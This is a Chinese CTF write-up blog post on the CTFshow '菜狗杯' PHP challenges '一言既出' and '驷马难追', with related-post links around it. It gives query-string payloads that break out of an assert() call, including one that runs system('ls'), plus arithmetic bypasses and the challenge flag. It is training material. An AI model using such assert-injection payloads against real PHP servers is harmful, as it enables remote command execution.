CTFshow-菜狗杯-一言既出&&驷马难追

cj俊俊

已于 2025-03-03 22:48:35 修改

阅读量174

点赞数 4

文章标签：网络安全学习

于 2025-03-03 21:07:32 首次发布

本文链接：https://blog.csdn.net/m0_53669634/article/details/145998799

版权

一言既出

1、解题思路

阅读PHP代码，发现有两个if语句，需要满足num==114514，同时还存在一个assert断言语句，要求满足，num=1919810，否则输出die()内容。
==为若比较类型可以通过转换字符类型绕过
而同时又要满足assert内容，只能通过闭合assert语句或者是assert为真绕过。
在这里插入图片描述

2、解题方法一

？num=114514)==1 or system(‘ls’);%23

实际执行
assert("intval($_GET[114514])==1 or system('ls');#)==1919810") or die("一言既出，驷马难追!")
echo $flag;

%23是注释符#的编码形式

3、解题方法二

？num=114514);(1919810

实际执行
assert("intval($_GET[114514]);(1919810==1919810") or die("一言既出，驷马难追!")
echo $flag;

4、获得flag

ctfshow{e1a3af51-efe0-4a94-9404-426a0fb0a40e}
在这里插入图片描述

5、补充方法

在看到驷马难追题目是，发现还有一种更加简单的绕过方案，即通过运算的方式满足运算

?num=114514%2b1805296
%2b为+

在这里插入图片描述

驷马难追

1、解题思路

使用了更加严格的限制，无法使用();等符号，所以无法使用闭合的方式，只能通过运算的方式满足条件

?num=114514%2b1805296

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

cj俊俊

关注关注

4
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

ctfshow-菜狗杯-WEB-wp

F1rstb100d

11-14

1626

ctfshow-菜狗杯-WEB-wp

CTFSHOW 菜狗杯 一言既出 解题思路和方法（两种方法解决）

weixin_58052886的博客

06-13

1094

可以看到报错信息，由于intval(114514)的值不等于1919810，运行了die函数，输出 “一言既出，驷马难追!那么我们可以考虑使用对num的值对第二句话进行绕过，即不执行后面的语句，在php中 // 表示注释，那么使用该知识点进行payload构造，为了保证语法的完整性，我们在数字的后面加上了 );弱口令比较的过程中，如果数字开头，会提取开头的数字，然后比较。有了以上知识，我们就可以通过构造payload进行测试，首先num的值需要等于114514，查看结果。

参与评论您还未登录，请先登录后发表或查看评论

NSS [SWPUCTF 2022 新生赛]funny_web

Jay17的博客

07-09

423

NSS [SWPUCTF 2022 新生赛]funny_web

CTF中的PHP特性函数（中）

二狗的博客

01-04

599

今天这篇文章可能有的地方不是很好理解，但总体来说还是很简单的，PHP特性很多以至于只能挑出一些著名的来说，喜欢本文的小伙伴希望可以一键三连支持一下。

CTFshow-菜狗杯-注释-一言既出-驷马难追

qq_31415417的博客

01-04

1161

CTFshow-菜狗杯-注释-一言既出-驷马难追

CTFSHOW 菜狗杯--WEB

weixin_45908624的博客

01-09

4193

CTFShow--菜狗杯--web

ctfshow(菜狗杯）

qq_62046696的博客

11-28

6556

这样的话cookie传入 =a ,然后破石头 a=b ,get b=c,request可以接收post和get请求，最后c因为用数组传参所以要带上后面的东西。这道题其实，看if($arr[]=1)这个等于号，是一个所以这是一个赋值的操作，肯定为true会进行die的操作，所以0=1随便赋值。然后input=加密传参，action=test，但是这里一直没成功，弄了好久才发现+被过滤掉了，需要一层的url 编码。的个数，%4e这样的形式只占用一个字节，是统计 a=%4e统计等号的右边。

ctfshow【菜狗杯】misc

leekos的博客，分享web安全相关知识~

03-13

3075

ctfshow【菜狗杯】misc

CTFshow 2022 菜狗杯部分WEB WP

starttv的博客

11-13

1900

右键发现js源代码，将js代码全部复制下来，放在js在线运行工具里，在最后加上g1ve_flag();访问/secret_path_you_do_not_know/secretfile.txt。extract() 函数从数组中将变量导入到当前的符号表。针对数组中的每个元素，将在当前符号表中创建对应的一个变量。该函数使用数组键名作为变量名，使用数组键值作为变量值。套娃题，自己本地搭环境，慢慢试就试出来了。可以实现任意文件下载，除了flag。把这里的修改即可得到flag。检查源代码发现存在文件下载。

ctfshow 菜狗杯 一言既出 wp

08-19

综上所述，ctfshow菜狗杯比赛中的一言既出题目需要进行目录遍历、下载源码文件、JWT解密和修改布尔值；另外，还需要解决损坏压缩包的问题，并通过手机拍照和比对阴影图来解决困难的题目。<span class="em">1</span>...

ctfshow 一言既出

07-29

- *1* [CTFshow-菜狗杯-注释-一言既出-驷马难追](https://blog.csdn.net/qq_31415417/article/details/128552487)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

诚信教育：一言既出，驷马难追 - 中学生思想品德课

在【标题】"一言既出驷马难追-诚信是金_说课_精美学习课件ppt"中，"一言既出，驷马难追"是成语，象征言出必行，强调诚信的重要性。"诚信是金"则直接表达了诚信如同金子般珍贵的主题。【描述】通过"一言既出，...

一文解读，网络安全行业人才需求情况《网络安全产业人才发展报告》

weixin_59086772的博客

10-18

8685

随着近几天国家网络安全宣传周在全国各地开展活动，网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里，惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何？该怎么提升自我能力，更快地加入网安行列。今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。一、网络安全行业市场发展情况网络时代生活越来越离不开网络，与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障，个人和企业等重.

10.学习笔记-MyBatisPlus(P105-P110)

zsysingapore的博客

04-29

493

比如有两张数据表，一张是员工表，一张是员工业绩表，通过员工的id关联，如果该员工离职，首先员工表的数据要被删除，对应的员工业绩表则成了垃圾数据，也要删除。通过Mp的api删除，是看不到被删除的数据，如果此时还想看到全数据（包括deleted=0以及deleted=1，就去Dao层写SQL语句。如果函数不支持Mp，恢复到最早的Mybatis，在数据接口层Dao中，继续用@select，下面添加sql语句。场景：八个人去抢最后的一个商品，会出现-1，-2，-3…抽象类不能直接用，我们使用的是抽象类的实现类。

Linear Algebra and Learning from Data 线性代数与数据学习

2201_75801514的博客

04-28

404

Updates ongoing.

OpenGL-ES 学习(15) ----纹理